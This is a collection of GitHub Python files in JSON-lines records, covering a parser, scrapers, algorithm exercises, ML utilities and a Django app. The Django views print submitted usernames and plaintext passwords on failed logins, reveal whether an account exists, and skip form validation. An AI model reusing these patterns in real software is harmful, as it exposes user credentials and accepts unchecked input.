pd.read_csv(\"Tabela1.csv\")\n file = open('code.txt', 'r')\n #scan(file)\n\n token = getToken(file)\n if(TOKEN):\n print(f\"TOKEN {token}\")\n #print(Tabela[[\"inteiro\"]])\n\n #print(Tabela)\n while(True):\n \n if((token[\"classe\"]==\"EOF\" and pilha[-1] == \"0\")):\n break\n\n\n while(token == None):#comentario\n token = getToken(file)\n if(TOKEN):\n print(f\"TOKEN {token}\")\n\n UltimoPilha = pilha.pop()\n \n #print(Tabela.loc[2,\"varinicio\"])\n if(GET_ON_TABLE):\n print(f\"GET TABELA1 [{UltimoPilha}] , [{token['classe']}] = {Tabela.loc[int(UltimoPilha),token['classe']]} \")\n \n Action = Tabela.loc[int(UltimoPilha),token['classe']]\n while pd.isnull(Tabela.loc[int(UltimoPilha),token['classe']]):\n \n print(f\"[ERRO_PARSER]\\t{getLinhaColuna()} -> SRL TABLE[{UltimoPilha}][{token['classe']}] = {Action}, A sintaxe não valida, ferifique o Token: {token}\" )\n token = getToken(file)\n if(GET_ON_TABLE):\n print(f\"GET TABELA1 [{UltimoPilha}] , [{token['classe']}] = {Tabela.loc[int(UltimoPilha),token['classe']]} \")\n Action = Tabela.loc[int(UltimoPilha),token['classe']]\n\n if Action == \"acc\":\n break\n #print(Action)\n \n \n Action = Action.split(\".\")\n #print (f\"Action {Action}\")\n #print(Action)\n \n while(Action[0] == 'R'):\n if(REDUCE):\n print(f\"-->\\t\\tReduce {Action[1]}\")\n\n Gram = gram[int(Action[1])]\n \n if(REDUCTION_GRAM):\n print(f\">>>>>>>>>>>>>>>>> Gram[{int(Action[1])+1}] - {Gram[0]} ->\",end=' ')\n for i in (range(1,len(Gram))):\n print(f\"{Gram[i]}\",end=' ')\n print()\n \n \n lexemaList = []\n lexemaListTemp = []\n for i in reversed(range(1,len(Gram))):\n UltimoPilha = pilha.pop() # token\n lexemaListTemp.append(UltimoPilha['lexema'])\n\n if((UltimoPilha['classe'] != Gram[i]) == True): \n print(UltimoPilha['classe'] != Gram[i])\n print(f\"{UltimoPilha['classe']}!={Gram[i]}.\")\n if(UltimoPilha['classe'] != Gram[i]):#!!!!!!!\n print(\"[ERRO]\\tTabela e gramatica não bate.\")\n UltimoPilha = pilha.pop() # num\n lexema = ''\n \n for i in reversed(range(1,len(Gram))):\n lexemaList.append(lexemaListTemp.pop())\n\n #tempList = lexemaList.copy()\n tempList = []\n #tempList = [item for sublist in lexemaList for item in sublist]\n for A in lexemaList:\n if (type(A) == list):\n for item in A:\n tempList.append(item)\n else: \n tempList.append(A)\n\n #print(f\"templist{tempList}\")\n\n if(LEXEMA):\n print(tempList)\n print()\n#################### OBJ\n makeObj(int(Action[1])+1,tempList)\n #print(tempList)\n\n \n\n pilha.append(UltimoPilha)\n NewToken = {\"classe\" : Gram[0], \"lexema\": tempList, \"tipo\":'?'} \n pilha.append(NewToken)\n if(GET_ON_TABLE):\n print(f\"GET TABELA2 [{int(UltimoPilha)}] , [{Gram[0]} ] = {Tabela.loc[int(UltimoPilha),Gram[0]]}\")\n \n pilha.append(Tabela.loc[int(UltimoPilha),Gram[0]])\n \n if(PRINT_PILHA):\n print(pilha)\n\n UltimoPilha = pilha.pop()\n Action = Tabela.loc[int(UltimoPilha),token['classe']]\n\n while pd.isnull(Tabela.loc[int(UltimoPilha),token['classe']]):\n print(f\"[ERRO_PARSER]\\t{getLinhaColuna()} -> SRL TABLE[{UltimoPilha}][{token['classe']}] = {Action}, A sintaxe não valida, verifique o Token: {token}\" )\n token = getToken(file)\n if(GET_ON_TABLE):\n print(f\"GET TABELA1 [{UltimoPilha}] , [{token['classe']}] = {Tabela.loc[int(UltimoPilha),token['classe']]} \")\n Action = Tabela.loc[int(UltimoPilha),token['classe']]\n\n if Action == \"acc\":\n\n break\n if(GET_ON_TABLE):\n print(f\"GET TABELA3 [{UltimoPilha}] , [{token['classe'] }] = {Action}\")\n Action = Action.split(\".\")\n if(GET_ON_TABLE):\n print(f\"ACTION{Action}\")\n \n \n if(Action[0] == 'S'):\n if(SHIFT):\n print(f\"-->\\t\\tShift {Action[1]}\")\n #print(f\"UltimoPilha = {UltimoPilha}\")\n pilha.append(UltimoPilha)\n pilha.append(token)\n pilha.append(Action[1])\n\n if Action == \"acc\":\n break\n if(Action[0] != 'S' and Action[0] != 'R'):\n print(f\"[ERRO_PARSER]\\t{getLinhaColuna()}\\t{Action} nao valida\" )\n pilha.append(UltimoPilha)\n\n token = getToken(file)\n if(TOKEN):\n print(f\"TOKEN {token}\")\n if(FULL_PILHA):\n print()\n print(*pilha, sep='\\n')\n print()\n \nif __name__ == \"__main__\":\n main()\n listVar()\n #returnTabeladesimbulo()\n #print(pilha)\n\n\n\n","repo_name":"VVSRevolution/Compiladores","sub_path":"Compilador/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11455702228","text":"#!/usr/bin/env python3\r\n\r\nimport requests\r\nimport codecs\r\nimport re\r\n\r\n# Don't include the gender icons from FontAwesome\r\nicon_blacklist = [\r\n \"genderless\", \"transgender.*\", \"neuter\", \"mars.*\", \"venus.*\", \"mercury.*\",\r\n \"intersex\"\r\n]\r\n\r\njs_template_header = \"\"\"\r\n.pragma library\r\n\r\nvar map = {\r\n\"\"\"\r\n\r\njs_template_footer = \"\"\"\r\n};\r\n\"\"\"\r\n\r\nfontFilename = ''\r\n\r\n\r\ndef is_blacklisted(icon_name):\r\n for blacklisted_icon in icon_blacklist:\r\n if re.match(blacklisted_icon, icon_name):\r\n return True\r\n\r\n return False\r\n\r\n\r\ndef get_awesome_icons():\r\n print('Downloading SCSS file...')\r\n\r\n response = requests.get('http://raw.githubusercontent.com/FortAwesome/' +\r\n 'Font-Awesome/master/scss/_variables.scss')\r\n icons = []\r\n\r\n for line in response.text.split('\\n'):\r\n if not line.startswith('$fa-var-'):\r\n continue\r\n\r\n line_array = line[8:].strip().split(': ')\r\n\r\n name = line_array[0].replace('-', '_')\r\n code = line_array[1][2:].strip(';').strip('\"')\r\n\r\n icons.append((name, code))\r\n\r\n return icons\r\n\r\n\r\ndef save_icons(icons, filename):\r\n saved_count = 0\r\n\r\n with codecs.open(filename, encoding='utf-8', mode='w') as f:\r\n f.write(js_template_header)\r\n\r\n for icon_name, code in icons:\r\n if not is_blacklisted(icon_name):\r\n saved_count += 1\r\n f.write(\" '{0}': '\\\\u{1}',\\n\".format(icon_name, code))\r\n\r\n f.write(js_template_footer)\r\n\r\n print('Wrote {0} of {1} icons to {2}'.format(saved_count,\r\n len(icons), filename))\r\n\r\n\r\ndef download_font(url, filename):\r\n print('Downloading font...')\r\n\r\n response = requests.get(url)\r\n\r\n with open(filename, 'wb') as out_file:\r\n out_file.write(response.content)\r\n\r\n print('Wrote {0}'.format(filename))\r\n\r\n\r\nif __name__ == '__main__':\r\n icons = get_awesome_icons()\r\n save_icons(icons, 'awesome.js')\r\n\r\n download_font('http://github.com/FortAwesome/Font-Awesome/' +\r\n 'raw/master/fonts/FontAwesome.otf',\r\n 'fonts/fontawesome/FontAwesome.otf')\r\n","repo_name":"apertus-open-source-cinema/opencine","sub_path":"Source/Archive/MaterialTest/3rdParty/Material/modules/Material/make_awesome.py","file_name":"make_awesome.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"37"} +{"seq_id":"74167466347","text":"import time\n\nfrom ..until import until\nfrom urllib import parse\n\nfrom os.path import basename,splitext\nfrom scrapy_redis.spiders import RedisCrawlSpider\nfrom scrapy.contrib.spiders import Rule\nfrom scrapy.contrib.linkextractors import LinkExtractor\nfrom ..items import *\n# from scrapy.loader import ItemLoader\n\nfrom tutorial.settings import *\n\nclass Base(RedisCrawlSpider):\n \"\"\"Spider that reads urls from redis queue (myspider:start_urls).\"\"\"\n name = 'base'\n redis_key = 'base:start_urls'\n allowed_domains = ALLOWED_DOMAINS\n\n rules = (\n # follow all links\n Rule(LinkExtractor(deny=('english.dhu.edu.cn')), callback='parse_page', follow=True),\n )\n\n def parse_test(self, response):\n print(response.url)\n\n def get_page_item(self, response):\n nowtime = time.time()\n url = response.url\n origin = parse.urlparse(url).netloc\n\n _str = '<__split>'\\\n 'data: {}\\n' \\\n 'url: {}\\n' \\\n 'origin: {}\\n' \\\n '<\\__split>\\n'\\\n '\\n' \\\n .format(nowtime, url, origin)\n return _str\n\n def parse_page(self, response):\n\n page = until.md5(response.url.encode())\n # print(response.url)\n\n until.save_file(path=ALL_FILE_PATH, name=page + '.sraw', content=self.get_page_item(response).encode() + response.body)\n\n urlItem = InformationItem()\n urlItem['urls'] = parse.quote_plus(response.url)\n yield urlItem\n\n links = response.xpath('//a')\n for index, alink in enumerate(links):\n href = alink.xpath('@href').extract_first()\n path = parse.urlparse(href).path\n filename = '%s' % basename(path)\n extrename = splitext(filename)[1]\n\n if extrename in INCLUDE_FILE_TYPE:\n name = alink.xpath('text()').extract_first()\n fileItem = self.getFileItem(self.cutHref(href, response.url), name)\n yield fileItem\n\n\n\n def getFileItem(self, file_urls=None, name=None):\n fileItem = FileItem()\n if file_urls is None or name is None:\n return fileItem\n else:\n fileItem['file_urls'] = [file_urls] # 必须为一个list\n fileItem['name'] = name\n return fileItem\n\n def cutHref(self, href='', url=''):\n if until.isHasHttpOrHttps(href):\n return href\n return parse.urljoin(url, href.strip())\n\n","repo_name":"maiff/crawl_Search_Enginee","sub_path":"tutorial/spiders/Base.py","file_name":"Base.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74220023148","text":"import collections\nimport zarr\nfrom gunpowder import ArrayKey\n\n\nclass Label(object):\n def __init__(\n self,\n labelname,\n labelid,\n generic_label=None,\n targetid=None,\n thr=128,\n scale_loss=True,\n scale_key=None,\n add_constant=None,\n separate_labelset=False,\n frac_pos=0.5,\n frac_neg=0.5,\n ):\n\n self.labelname = labelname\n if not isinstance(labelid, collections.Iterable) and labelid is not None:\n labelid = (labelid,)\n self.labelid = labelid\n if generic_label is not None and not isinstance(\n generic_label, collections.Iterable\n ):\n generic_label = (generic_label,)\n self.generic_label = generic_label\n self.targetid = targetid\n self.thr = thr\n self.separate_labelset = separate_labelset\n if self.separate_labelset and self.separate_labelset is not None:\n self.gt_key = ArrayKey(\"GT_\" + self.labelname.upper())\n elif not self.separate_labelset and self.separate_labelset is not None:\n self.gt_key = ArrayKey(\"GT_LABELS\")\n else:\n self.gt_key = None\n self.gt_dist_key = ArrayKey(\"GT_DIST_\" + self.labelname.upper())\n self.pred_dist_key = ArrayKey(\"PRED_DIST_\" + self.labelname.upper())\n self.mask_key = ArrayKey(\"MASK_\" + self.labelname.upper())\n self.scale_loss = scale_loss\n self.add_constant = add_constant\n self.frac_pos = frac_pos\n self.frac_neg = frac_neg\n # self.data_dir = data_dir\n # self.data_sources = data_sources\n # self.total_voxels = compute_total_voxels(self.data_dir, self.data_sources)\n num = 0\n # if data_sources is not None:\n # for ds in data_sources:\n # zf = z5py.File(ds.full_path, use_zarr_format=False)\n # for l in labelid:\n # if l in zf[\"volumes/labels/all\"].attrs[\"relabeled_ids\"]:\n # num += zf[\"volumes/labels/all\"].attrs[\"relabeled_counts\"][\n # zf[\"volumes/labels/all\"].attrs[\"relabeled_ids\"].index(l)\n # ]\n # if num > 0:\n # self.class_weight = float(self.total_voxels) / num\n # else:\n # self.class_weight = 0.0\n # print(labelname, self.class_weight)\n\n if self.scale_loss:\n self.scale_key = ArrayKey(\"SCALE_\" + self.labelname.upper())\n if scale_key is not None:\n self.scale_key = scale_key\n if not self.scale_loss and scale_key is None:\n self.scale_key = self.mask_key\n\n\ndef filter_by_category(list_of_datasets, category):\n filtered = []\n for ds in list_of_datasets:\n if category in ds.special_categories:\n filtered.append(ds)\n return filtered\n\n\ndef compute_total_voxels(data_dir, data_sources):\n voxels = 0\n if data_sources is not None:\n for ds in data_sources:\n zf = zarr.open(ds.full_path, mode=\"r\")\n try:\n for c in zf[\"volumes/labels/all\"].attrs[\"orig_counts\"]:\n voxels += c\n except KeyError as e:\n raise e\n return voxels\n","repo_name":"saalfeldlab/CNNectome","sub_path":"CNNectome/utils/label.py","file_name":"label.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"7936662961","text":"import sys\nsys.stdin = open('2178.txt', 'r')\n\nN, M = map(int, input().split())\nL = []\nfor i in range(N):\n tmp = list(input())\n L += [list(map(int, tmp))]\n\ndir = [(-1, 0), (1, 0), (0, -1), (0, 1)] # 좌, 우, 상, 하\n\n\ndef bfs(j, i):\n cnt = 1\n q = [(j, i)]\n vst = [[0]*M for _ in range(N)]\n vst[i][j] = 1\n\n while q:\n for _ in range(len(q)):\n cur = q.pop(0)\n for d in dir:\n xx = cur[0] + d[0]\n yy = cur[1] + d[1]\n if 0 <= xx < M and 0 <= yy < N:\n if xx == M-1 and yy == N-1:\n cnt += 1\n return cnt\n if vst[yy][xx] == 0 and L[yy][xx] == 1:\n q.append((xx, yy))\n vst[yy][xx] = 1\n cnt += 1\n\n\nprint(bfs(0, 0))","repo_name":"anyl92/ALGORITHM","sub_path":"baek/baek_2178_miro.py","file_name":"baek_2178_miro.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43859366904","text":"#!/usr/bin/python3\n'''utf-8 validation'''\n\n\nimport math\n\n\ndef validUTF8(data):\n '''defining the function'''\n # lis = []\n if data == []:\n return True\n if not isinstance(data, list):\n return False\n lis2 = []\n lis3 = []\n for x in data:\n if x == 0:\n # lis.append(0)\n return True\n if x < 0:\n return False\n if type(x) is not int:\n return False\n lis = []\n while x > 0:\n res = x % 2\n lis.append(res)\n x = math.floor(x / 2)\n if x < 0:\n break\n lis2 = lis[::-1]\n if len(lis2) > 8:\n lis2.pop(0)\n lis4 = []\n if len(lis2) < 8:\n rem = 8 - len(lis2)\n for i in range(rem):\n lis4.append(0)\n # lis2.append(0)\n lis4.extend(lis2)\n lis3.append(lis4)\n # lis2[:0] = [1]\n # print(lis3)\n no = 0\n for list_item in lis3:\n # print (list_item.index(0))\n if no == 0:\n if (list_item.index(0)) == 0:\n # no = 1\n continue\n elif (list_item.index(0)) == 2:\n no = 1\n elif (list_item.index(0)) == 3:\n no = 2\n elif (list_item.index(0)) == 4:\n no = 3\n else:\n return False\n else:\n if (list_item.index(0)) != 1:\n return False\n no -= 1\n return no == 0\n","repo_name":"joyogbu/alx-interview","sub_path":"0x04-utf8_validation/0-validate_utf8.py","file_name":"0-validate_utf8.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71942460268","text":"'''\nCreated on 2016年1月11日\n\n@author: Darren\n'''\n'''\nGiven n non-negative integers a1, a2, ..., an, where each represents a point at coordinate (i, ai). \nn vertical lines are drawn such that the two endpoints of line i is at (i, ai) and (i, 0). \nFind two lines, which together with x-axis forms a container, such that the container contains the most water.\n\n'''\nclass Solution(object):\n def maxArea(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n if not height or len(height)<2:\n return 0\n left,right=0,len(height)-1\n res=0\n while left str:\n \"\"\"\n This removes URL links from the text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing URL's\n :rtype: str\n \"\"\"\n return re.sub(pattern=r\"http\\S+\", repl=\"\", string=in_doc)\n\n @staticmethod\n def remove_emails(in_doc: str) -> str:\n \"\"\"\n This removes email addresses from the free text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing email addresses\n :rtype: str\n \"\"\"\n return re.sub(pattern=r\"\\S*@\\S*\\s?\", repl=\"\", string=in_doc)\n\n @staticmethod\n def remove_non_ascii(in_doc: str) -> str:\n \"\"\"\n This method removes all non ascii characters from the text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing the non ascii characters\n :rtype: str\n \"\"\"\n normal_doc = unicodedata.normalize(\"NFKD\", in_doc)\n encoded_doc = normal_doc.encode(encoding=\"ascii\", errors=\"ignore\")\n decoded_doc = encoded_doc.decode(\"utf-8\", \"ignore\")\n return decoded_doc\n\n @staticmethod\n def remove_punctuations(in_doc: str) -> str:\n \"\"\"\n This method removes all the punctuations from the text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing punctuations\n :rtype: str\n \"\"\"\n return re.sub(pattern=r\"[^\\w\\s]\", repl=\"\", string=in_doc)\n\n @staticmethod\n def remove_digits(in_doc: str) -> str:\n \"\"\"\n To remove numerical characters from the free text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing the numerical characters\n :rtype: str\n \"\"\"\n return \"\".join([c for c in in_doc if not c.isdigit()])\n\n def remove_stopwords(self, in_doc: str) -> str:\n \"\"\"\n To remove stop words from text\n\n :param in_doc: Free text\n :type in_doc: str\n :return: Text after removing stop words\n :rtype: str\n \"\"\"\n words_list = in_doc.split(sep=\" \")\n return \" \".join(\n [word for word in words_list if word not in self.stopwords_list]\n )\n\n def clean_text(self, doc: str) -> str:\n \"\"\"\n This method applies text cleaning tools on the free text and returns a cleaned\n text\n\n :param doc: Free text\n :type doc: str\n :return: Text after passing it through multiple text cleaning tools\n :rtype: str\n \"\"\"\n doc = self.remove_url(in_doc=doc)\n doc = self.remove_emails(in_doc=doc)\n doc = self.remove_non_ascii(in_doc=doc)\n doc = self.remove_punctuations(in_doc=doc)\n doc = self.remove_digits(in_doc=doc)\n\n # Replace multiple white spaces with single white space\n doc = re.sub(pattern=r\" +\", repl=\" \", string=doc)\n\n # Convert text to lower case\n doc = doc.lower()\n\n doc = self.remove_stopwords(in_doc=doc)\n return doc\n\n @staticmethod\n def docs_empty(docs: list) -> bool:\n \"\"\"\n To check if the list of documents have no content\n\n :param docs: The list of documents to be checked\n :type docs: list\n :return: Whether the documents have no content\n :rtype: bool\n \"\"\"\n if all(\"\" == s or s.isspace() for s in docs):\n return True\n\n return False\n\n def encode_documents(self, documents) -> dict:\n \"\"\"\n This method cleans the free text and then vectorize into a matrix using TF-IDF\n approach\n\n :param documents: List of free text documents\n :type documents: list\n :return: A dictionary containing two objects:\n `features` -- A list of all the words or tokens from the entire corpus, and\n `vectors` -- A TF-IDF matrix from the cleaned text\n :rtype: str\n \"\"\"\n sanitised_documents = [self.clean_text(doc=doc) for doc in documents]\n if self.docs_empty(docs=sanitised_documents):\n return {\n \"features\": [],\n \"vectors\": csr_matrix((len(sanitised_documents), 0), dtype=np.float32),\n }\n\n vectorizer = TfidfVectorizer(dtype=np.float32)\n vectors = vectorizer.fit_transform(raw_documents=sanitised_documents)\n return {\"features\": vectorizer.get_feature_names(), \"vectors\": vectors}\n","repo_name":"riyuexing/totara","sub_path":"extensions/ml_service/service/recommender/data_subroutines/text_encoder.py","file_name":"text_encoder.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"74153904426","text":"import gym\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nfrom models import CQLAgent\nfrom utils import eval_policy, register_custom_envs\n\n\ndef plot_params():\n alphas = [0.5, 1.0, 3.0, 5.0, 10.0]\n df_dict = dict()\n for alpha in alphas:\n df = pd.read_csv(f\"logs/cql/cql_alpha{alpha}.csv\", index_col=0)\n df_dict[alpha] = df\n\n cols = [\"reward\", \"mse_loss\", \"cql_loss\", \"avg_ood_Q\", \"avg_Q\", \"avg_target_Q\"]\n _, axes = plt.subplots(nrows=2, ncols=3, figsize=(16, 8))\n for alpha in alphas:\n for idx, col in enumerate(cols):\n ax = axes[idx//3][idx%3]\n df = df_dict[alpha]\n ax.plot(df[\"step\"].values/1e5, df[col].values, label=f\"{alpha}\")\n ax.legend()\n ax.set_title(col)\n plt.savefig(\"demo.png\", dpi=360)\n\n\ndef plot_trajs():\n register_custom_envs()\n env = gym.make(\"PointmassHard-v2\")\n obs_dim = np.prod(env.observation_space.shape)\n act_dim = env.action_space.n\n agent = CQLAgent(obs_dim=obs_dim, act_dim=act_dim)\n raw_reward = eval_policy(agent, env)\n agent.load(\"saved_models/cql/cql_s42\")\n for _ in range(21):\n _ = eval_policy(agent, env)\n env.plot_trajectories(\"imgs/cql_trajs.png\")\n\n\nif __name__:\n plot_trajs()\n","repo_name":"fuyw/jrlzoo","sub_path":"awac/discrete/torch/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"70384586987","text":"# Expected Time Complexity : O(N1/2)\r\n# Expected Auxilliary Space : O(1)\r\n\r\nimport math\r\n\r\n\r\ndef isPrime(N):\r\n # Your code here\r\n if N == 1:\r\n return True\r\n for i in range(2, 1 + int(math.sqrt(N))):\r\n if N % i == 0:\r\n return False\r\n return True\r\n\r\n\r\nnum = 15\r\nprint(isPrime(num))\r\n","repo_name":"arnabbarui5/Data-Structures-and-Algotithms-GFG","sub_path":"Python GFG/Mathematics/Primality Test.py","file_name":"Primality Test.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73992588587","text":"# from multiprocessing import context\n# from cProfile import Profile\n# from multiprocessing import context\n# import re\n# import re\n# from cProfile import Profile\nfrom email import message\n# from tkinter.messagebox import RETRY\nfrom urllib.request import Request\nfrom django import forms\nfrom django.contrib import messages\nfrom django.shortcuts import render,redirect\nfrom django.urls import reverse\nfrom django.db.models import Q\n\nfrom .forms import UserGet\n\nfrom django.contrib.auth.models import User\n\nfrom django.contrib.auth import authenticate, login, logout\n\nfrom django.http import HttpResponseRedirect, HttpResponse\n\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.http import HttpResponse\n# from matplotlib.style import use\n# from matplotlib.style import use\n# from responses import registered\n# from matplotlib.style import use\n\nfrom .models import Room, Topic,Topic2, User2,Webpage,Message,AccessRecord,UserProfileInfo\nfrom .forms import RoomForm, UserForm, UserProfileInfoForm\nfrom .furm import FormNAme\nfrom base import furm\nfrom .furm import User2Form\n\n\n# Create your views here.\n# from studybud import \n\n\n\n# Create your views here.\n# def home(request):\n# return HttpResponse(\"Home Page\")\n\n# def products(request):\n# return HttpResponse(\"product\")\n\n# def customer(request):\n# return HttpResponse(\"customer\")\n\n# rooms = [\n# {'id' : 1, 'name' : 'Lets Learn Python'},\n# {'id' : 2, 'name' : 'Design with me '},\n# {'id' : 3, 'name' : 'Front end developer'},\n\n# ]\ndef loginPage(request):\n \n\n if request.method == 'POST':\n\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n try:\n user = User.objects.get(username=username)\n except:\n messages.error(request, 'User does not exist')\n\n user = authenticate(request, username=username, password=password)\n\n if user is not None:\n # if user.is_active:\n login(request, user)\n return redirect('home')\n else:\n messages.error(request, 'User name or Password does not exit')\n \n context = {}\n\n return render(request , 'accounts/login_register.html', context)\n\ndef home(request):\n\n q = request.GET.get('q') if request.GET.get('q') != None else ''\n\n\n rooms = Room.objects.filter(\n Q(topic__name__icontains=q) |\n Q(name__icontains=q) |\n Q(discription__icontains=q)\n )\n\n\n topics = Topic.objects.all()\n\n room_count = rooms.count()\n context = {'rooms' : rooms , 'topics': topics, 'room_count':room_count}\n return render(request , 'accounts/dashboard.html' , context)\n\ndef room(request , pk ):\n room = Room.objects.get(id=pk)\n\n # room = None\n # for i in rooms:\n # if i['id'] == int(pk):\n # room = i\n context = {'room' : room}\n return render (request , 'accounts/room.html' , context)\n \n\ndef createRoom(request):\n form = RoomForm()\n if request.method == 'POST':\n # print(request.POST)\n form = RoomForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('home')\n\n context = {'form' : form}\n\n\n return render (request , 'accounts/room_form.html' , context)\n\ndef updateRoom(request, pk):\n room = Room.objects.get(id=pk)\n form =RoomForm(instance=room)\n if request.method == 'POST':\n form = RoomForm(request.POST, instance=room)\n if form.is_valid():\n form.save()\n return redirect('home') \n\n context = {'form': form}\n\n\n return render(request, 'accounts/room_form.html', context)\n\ndef deleteRoom(request, pk):\n room = Room.objects.get(id=pk)\n if request.method == 'POST':\n room.delete()\n return redirect('home')\n\n context = {'obj': room}\n\n return render(request, 'accounts/delete.html', context)\n\n\n\n\n\n\n\n\ndef user_email(request):\n\n user_list = User2.objects.order_by('first_name')\n user_dict = {'users1': user_list}\n\n\n return render(request , 'accounts/home.html', context=user_dict)\n\n\ndef form_name_view(request):\n form = User2Form()\n if request.method == 'POST':\n # print(request.POST)\n form = User2Form(request.POST)\n if form.is_valid():\n form.save()\n return redirect('home')\n\n context = {'form' : form}\n\n\n return render (request , 'accounts/furm.html' , context=context)\n\n\n\n\n\n\ndef filter(request):\n context_dict = { 'text' : 'hello world' , 'number': 100 }\n\n return render(request , 'accounts/filter.html' , context=context_dict)\n\n\ndef index(request):\n return redirect('home')\n\n return render(request , 'accounts/index.html')\n\n\n@login_required\ndef special(request):\n\n return HttpResponse('you are Log in Nice!')\n\n\n\n@login_required\ndef user_logout(request):\n logout(request)\n\n return HttpResponseRedirect(reverse('home'))\n\ndef registration(request):\n\n registered = False\n\n if request.method == 'POST':\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileInfoForm(data= request.POST)\n\n if user_form.is_valid and profile_form.is_valid:\n user = user_form.save()\n user.set_password(user.password)\n user.save()\n\n profile = profile_form.save(commit=False)\n profile.user = user\n\n if 'profile_pic' in request.FILES:\n profile.profile_pic = request.FILES['profile_pic']\n\n profile.save()\n\n registered = True \n else:\n \n print(user_form.errors, profile_form.errors)\n else:\n user_form = UserForm()\n\n profile_form = UserProfileInfoForm()\n\n \n\n\n\n \n\n return render(request, 'accounts/registration.html',\n {'user_form': user_form,\n 'profile_form': profile_form,\n 'registered' : registered})\n\n\n\ndef user_login(request):\n\n if request.method == 'POST':\n\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n\n user = authenticate(username=username, password=password)\n\n\n if user:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect(reverse('home'))\n\n else:\n return HttpResponse('ACCOUNTS NOT ACTIVE')\n\n else:\n print(\"Some tried to log and failed\")\n\n print(\"Username: {} and Password {}\".format(username,password))\n\n return HttpResponse(\"invalid Log in detail Supplied\")\n else:\n return render(request , 'accounts/login.html', {})\n\n\n\n\n# def loginPage(request):\n\n\n# if request.method == 'POST':\n\n# username = request.POST.get('username')\n# password = request.POST.get('password')\n\n# try:\n# user = User.objects.get(username=username)\n# except:\n# messages.error(request, 'User does not exist')\n\n# user = authenticate(request, username=username, password=password)\n\n# if user is not None:\n# login(request, user)\n# return redirect('home')\n# else:\n# messages.error(request, 'User name or Password does not exit')\n \n# context = {}\n\n# return render(request , 'accounts/login_register.html', context)\n\n\n\n\n # form = furm.FormNAme()\n\n\n\n # # constext = {'form': form}\n # if request.method == 'POST':\n # form = furm.FormNAme(request.POST)\n # if form.is_valid:\n # print(\"Succes post\")\n # print(\"Name:\" +form.cleaned_data['name'])\n # print(\"Email:\" +form.cleaned_data['email'])\n # print(\"Text:\" +form.cleaned_data['text'])\n\n\n\n\n # form.cleaned_data['name']\n # return render(request , 'accounts/furm.html', {'form': form})\n \n\n\n \n\n# def customer(request):\n# return render(request,\"accounts/customer.html\")\n\n# def index(request):\n# my_dict = {'insert_me' : \"Hello I am from view.py\"}\n\n# return render(request , 'accounts/index.html' , context=my_dict)\n\n\n","repo_name":"ammarp03/django-deployment-example","sub_path":"base/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42090689122","text":"n = int(input())\ntemp = str(n)\n \nresult1 = 0\nresult2 = 0\nmid = len(temp) // 2\nfor i in range(mid):\n result1 += int(temp[i])\n\nfor i in range(mid,len(temp)):\n result2 += int(temp[i])\n\nif result1 == result2:\n print(\"LUCKY\")\nelse:\n print(\"READY\")","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"CodingTest/Implementation/solution5.py","file_name":"solution5.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1197865888","text":"import time\nimport cv2\n\n\"\"\" \ngstreamer_pipeline returns a GStreamer pipeline for capturing from the CSI camera\nFlip the image by setting the flip_method (most common values: 0 and 2)\ndisplay_width and display_height determine the size of each camera pane in the window on the screen\nDefault 1920x1080 displayd in a 1/4 size window\n\"\"\"\n\ndef gstreamer_pipeline(\n sensor_id=0,\n capture_width=1920,\n capture_height=1080,\n display_width=960,\n display_height=540,\n framerate=30,\n flip_method=0,\n):\n return (\n \"nvarguscamerasrc sensor-id=%d !\"\n \"video/x-raw(memory:NVMM), width=(int)%d, height=(int)%d, framerate=(fraction)%d/1 ! \"\n \"nvvidconv flip-method=%d ! \"\n \"video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! \"\n \"videoconvert ! \"\n \"video/x-raw, format=(string)BGR ! appsink\"\n % (\n sensor_id,\n capture_width,\n capture_height,\n framerate,\n flip_method,\n display_width,\n display_height,\n )\n )\n\ndef show_camera():\n # To flip the image, modify the flip_method parameter (0 and 2 are the most common)\n #pipeline = gstreamer_pipeline(flip_method=2)\n #print(pipeline)\n #video_capture = cv2.VideoCapture(pipeline, cv2.CAP_GSTREAMER)\n video_capture = cv2.VideoCapture(0)\n #video_capture = 